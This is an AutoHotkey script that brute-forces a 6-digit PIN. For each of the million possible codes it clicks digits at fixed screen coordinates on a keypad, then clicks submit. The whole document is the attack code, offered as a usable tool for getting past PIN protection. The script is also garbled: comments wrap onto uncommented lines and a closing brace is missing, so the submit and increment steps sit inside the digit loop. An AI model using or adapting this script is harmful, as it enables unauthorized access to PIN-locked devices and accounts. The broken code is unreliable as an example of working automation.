F3::
{
      pin := 0   ; Start with the first 6-digit PIN (000000)
    Loop (1000000) ; Loop through all possible 6-digit combinations (000000 to
999999)
    {
         pinString := Format("{:06}", pin) ; Format the PIN to be 6 digits, e.g.,
"000001"
         ; Click on each digit of the current PIN (replace x, y coordinates for each
digit)
         Loop 6
         {
             digit := SubStr(pinString, A_Index, 1)    ; Get each digit in the current
PIN
               ; Map each digit to its respective coordinates and click it
               if (digit = "0")
                   Click 377, 974    ; Replace with actual coordinates for "0"
               else if (digit = "1")
                   Click 135, 659 ; Replace with actual coordinates for "1"
               else if (digit = "2")
                   Click 374, 659 ; Replace with actual coordinates for "2"
               else if (digit = "3")
                   Click 619, 659 ; Replace with actual coordinates for "3"
               else if (digit = "4")
                   Click 131, 759 ; Replace with actual coordinates for "4"
               else if (digit = "5")
                   Click 373, 759 ; Replace with actual coordinates for "5"
               else if (digit = "6")
                   Click 618, 759 ; Replace with actual coordinates for "6"
               else if (digit = "7")
                   Click 139, 859 ; Replace with actual coordinates for "7"
               else if (digit = "8")
                   Click 371, 859 ; Replace with actual coordinates for "8"
               else if (digit = "9")
                   Click 620, 859 ; Replace with actual coordinates for "9"
             Sleep 500
       Sleep 1000
       Click 386, 924
       Sleep 1000
         ; Increment the PIN by 1 for the next attempt
         pin++
         ; Check if Esc is pressed to stop the script
         if GetKeyState("Esc", "P")
         {
             Break
         }
    }
}
return